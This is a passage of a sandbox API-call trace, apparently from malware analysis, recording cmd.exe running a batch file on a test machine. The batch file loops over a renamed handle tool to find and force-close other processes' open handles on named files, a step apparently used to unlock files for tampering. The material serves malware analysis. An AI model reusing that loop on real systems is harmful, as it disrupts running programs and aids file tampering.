ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6644b0 [0208.393] FindClose (in: hFindFile=0x6644b0 | out: hFindFile=0x6644b0) returned 1 [0208.393] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0208.393] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0208.393] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0208.393] GetProcessHeap () returned 0x650000 [0208.393] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6676b0 | out: hHeap=0x650000) returned 1 [0208.393] GetEnvironmentStringsW () returned 0x666b20* [0208.394] GetProcessHeap () returned 0x650000 [0208.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb82) returned 0x6676b0 [0208.394] FreeEnvironmentStringsW (penv=0x666b20) returned 1 [0208.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0208.394] GetProcessHeap () returned 0x650000 [0208.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664450 | out: hHeap=0x650000) returned 1 [0208.394] GetProcessHeap () returned 0x650000 [0208.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6643f0 | out: hHeap=0x650000) returned 1 [0208.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.394] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.116] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0209.117] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.117] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0209.117] SetConsoleInputExeNameW () returned 0x1 [0209.117] GetConsoleOutputCP () returned 0x1b5 [0209.117] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0209.118] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eefdc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0209.119] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0209.119] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.119] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664380 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664310 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6642a0 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664230 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650db8 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6641d0 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664170 | out: hHeap=0x650000) returned 1 [0209.119] GetProcessHeap () returned 0x650000 [0209.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x651230 | out: hHeap=0x650000) returned 1 [0209.119] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.120] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0209.120] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2eefc0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2eefc0*=0x94, lpOverlapped=0x0) returned 1 [0209.120] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0209.120] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.120] GetFileType (hFile=0x78) returned 0x1 [0209.120] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.121] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0209.121] GetProcessHeap () returned 0x650000 [0209.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x674b08 [0209.121] GetProcessHeap () returned 0x650000 [0209.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4008) returned 0x678b20 [0209.123] GetProcessHeap () returned 0x650000 [0209.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe) returned 0x650db8 [0209.123] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"component.exe\"") returned 0xf [0209.123] GetProcessHeap () returned 0x650000 [0209.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650db8 | out: hHeap=0x650000) returned 1 [0209.123] GetProcessHeap () returned 0x650000 [0209.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678b20 | out: hHeap=0x650000) returned 1 [0209.123] GetProcessHeap () returned 0x650000 [0209.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674b08 | out: hHeap=0x650000) returned 1 [0209.131] _tell (_FileHandle=3) returned 226 [0209.131] _close (_FileHandle=3) returned 0 [0209.131] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eed94 | out: _Buffer="\r\n") returned 2 [0209.131] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.131] GetFileType (hFile=0x7) returned 0x2 [0209.132] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.132] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed54 | out: lpMode=0x2eed54) returned 1 [0209.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eed80, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eed80*=0x2) returned 1 [0209.134] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0209.134] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0209.134] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eed90 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0209.135] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eed90 | out: _Buffer=">") returned 1 [0209.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.135] GetFileType (hFile=0x7) returned 0x2 [0209.135] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.135] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed58 | out: lpMode=0x2eed58) returned 1 [0209.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.135] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eed84, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eed84*=0x26) returned 1 [0209.136] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x2ef014 | out: _Buffer="FOR") returned 3 [0209.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.136] GetFileType (hFile=0x7) returned 0x2 [0209.136] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.136] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0209.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.137] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x3) returned 1 [0209.137] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2ef014 | out: _Buffer=" /F") returned 3 [0209.137] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.137] GetFileType (hFile=0x7) returned 0x2 [0209.137] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.137] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0209.138] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.138] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x3) returned 1 [0209.138] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2ef014 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0209.138] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.138] GetFileType (hFile=0x7) returned 0x2 [0209.139] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x20) returned 1 [0209.139] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x2ef014 | out: _Buffer=" %I IN ") returned 7 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] GetFileType (hFile=0x7) returned 0x2 [0209.140] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.140] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0209.140] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.140] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x7) returned 1 [0209.142] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x2ef010 | out: _Buffer="(`tdq963ii.exe -accepteula \"component.exe\" -nobanner`) DO ") returned 58 [0209.142] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.142] GetFileType (hFile=0x7) returned 0x2 [0209.142] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.142] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd0 | out: lpMode=0x2eefd0) returned 1 [0209.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.143] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x2eeffc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eeffc*=0x3a) returned 1 [0209.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.143] GetFileType (hFile=0x7) returned 0x2 [0209.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.143] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefdc | out: lpMode=0x2eefdc) returned 1 [0209.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.144] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2ef008, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2ef008*=0x1) returned 1 [0209.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.144] GetFileType (hFile=0x7) returned 0x2 [0209.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefc0 | out: lpMode=0x2eefc0) returned 1 [0209.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.146] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x65f4d0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2eefec, lpReserved=0x0 | out: lpBuffer=0x65f4d0*, lpNumberOfCharsWritten=0x2eefec*=0xc) returned 1 [0209.146] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2eeff8 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0209.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.147] GetFileType (hFile=0x7) returned 0x2 [0209.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.148] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefb8 | out: lpMode=0x2eefb8) returned 1 [0209.148] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eefe4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eefe4*=0x26) returned 1 [0209.150] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef014 | out: _Buffer=") ") returned 2 [0209.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.150] GetFileType (hFile=0x7) returned 0x2 [0209.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0209.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.151] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x2) returned 1 [0209.152] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef034 | out: _Buffer="\r\n") returned 2 [0209.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.152] GetFileType (hFile=0x7) returned 0x2 [0209.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0209.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eeff4 | out: lpMode=0x2eeff4) returned 1 [0209.153] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.153] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef020*=0x2) returned 1 [0209.154] GetProcessHeap () returned 0x650000 [0209.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2c) returned 0x651290 [0209.155] GetProcessHeap () returned 0x650000 [0209.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x650db8 [0209.155] GetProcessHeap () returned 0x650000 [0209.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x650dd0 [0209.155] GetProcessHeap () returned 0x650000 [0209.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe) returned 0x650de8 [0209.155] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0209.155] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0209.155] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0209.155] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0209.155] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0209.155] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0209.155] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0209.156] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x2eef50, _Radix=0 | out: _EndPtr=0x2eef50*=",6 delims=: \"") returned 3 [0209.156] wcstol (in: _String="6 delims=: \"", _EndPtr=0x2eef50, _Radix=0 | out: _EndPtr=0x2eef50*=" delims=: \"") returned 6 [0209.156] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0209.156] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0209.156] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0209.156] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0209.156] GetProcessHeap () returned 0x650000 [0209.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650de8 | out: hHeap=0x650000) returned 1 [0209.156] GetProcessHeap () returned 0x650000 [0209.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe) returned 0x650de8 [0209.156] GetProcessHeap () returned 0x650000 [0209.156] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x650db8, Size=0xe) returned 0x650e00 [0209.156] GetProcessHeap () returned 0x650000 [0209.156] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x650e00) returned 0xe [0209.156] GetProcessHeap () returned 0x650000 [0209.156] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x650dd0, Size=0x14) returned 0x6643b8 [0209.157] GetProcessHeap () returned 0x650000 [0209.157] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x6643b8) returned 0x14 [0209.157] _wpopen (_Command="tdq963ii.exe -accepteula \"component.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0209.177] feof (_File=0x77032960) returned 0 [0209.177] ferror (_File=0x77032960) returned 0 [0209.177] GetProcessHeap () returned 0x650000 [0209.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x108) returned 0x6643d8 [0209.177] fgets (_Buf=0x6643e0, _MaxCount=256, _File=0x77032960) Process: id = "174" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2f20e000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 702 os_tid = 0x8dc Thread: id = 709 os_tid = 0xb28 Thread: id = 710 os_tid = 0x2dc Process: id = "175" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f77e000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "145" os_parent_pid = "0x6f4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 703 os_tid = 0x264 [0182.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f96c | out: lpSystemTimeAsFileTime=0x28f96c*(dwLowDateTime=0x2617a540, dwHighDateTime=0x1d68287)) [0182.657] GetCurrentProcessId () returned 0xa44 [0182.657] GetCurrentThreadId () returned 0x264 [0182.657] GetTickCount () returned 0x115a371 [0182.657] QueryPerformanceCounter (in: lpPerformanceCount=0x28f964 | out: lpPerformanceCount=0x28f964*=30299581518) returned 1 [0182.659] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0182.659] __set_app_type (_Type=0x1) [0182.659] __p__fmode () returned 0x770331f4 [0182.659] __p__commode () returned 0x770331fc [0182.659] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0182.659] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0182.659] GetCurrentThreadId () returned 0x264 [0182.659] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x264) returned 0x60 [0182.659] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0182.660] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0182.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.660] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.660] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f8fc | out: phkResult=0x28f8fc*=0x0) returned 0x2 [0182.660] VirtualQuery (in: lpAddress=0x28f933, lpBuffer=0x28f8cc, dwLength=0x1c | out: lpBuffer=0x28f8cc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.660] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f8cc, dwLength=0x1c | out: lpBuffer=0x28f8cc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.660] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f8cc, dwLength=0x1c | out: lpBuffer=0x28f8cc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.660] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f8cc, dwLength=0x1c | out: lpBuffer=0x28f8cc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.660] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f8cc, dwLength=0x1c | out: lpBuffer=0x28f8cc*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x160000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0182.660] GetConsoleOutputCP () returned 0x1b5 [0182.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0182.661] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0182.661] _get_osfhandle (_FileHandle=1) returned 0x80 [0182.661] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0182.661] _get_osfhandle (_FileHandle=1) returned 0x80 [0182.661] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0182.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.661] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0182.661] GetEnvironmentStringsW () returned 0x5e2200* [0182.661] GetProcessHeap () returned 0x5d0000 [0182.662] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb88) returned 0x5e2d90 [0182.662] FreeEnvironmentStringsW (penv=0x5e2200) returned 1 [0182.662] GetProcessHeap () returned 0x5d0000 [0182.662] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x5e18e0 [0182.662] GetEnvironmentStringsW () returned 0x5e2200* [0182.662] GetProcessHeap () returned 0x5d0000 [0182.662] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb88) returned 0x5e3920 [0182.662] FreeEnvironmentStringsW (penv=0x5e2200) returned 1 [0182.662] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e86c | out: phkResult=0x28e86c*=0x68) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x0, lpData=0x28e878*=0x0, lpcbData=0x28e870*=0x1000) returned 0x2 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x1, lpcbData=0x28e870*=0x4) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x0, lpData=0x28e878*=0x1, lpcbData=0x28e870*=0x1000) returned 0x2 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x0, lpcbData=0x28e870*=0x4) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, 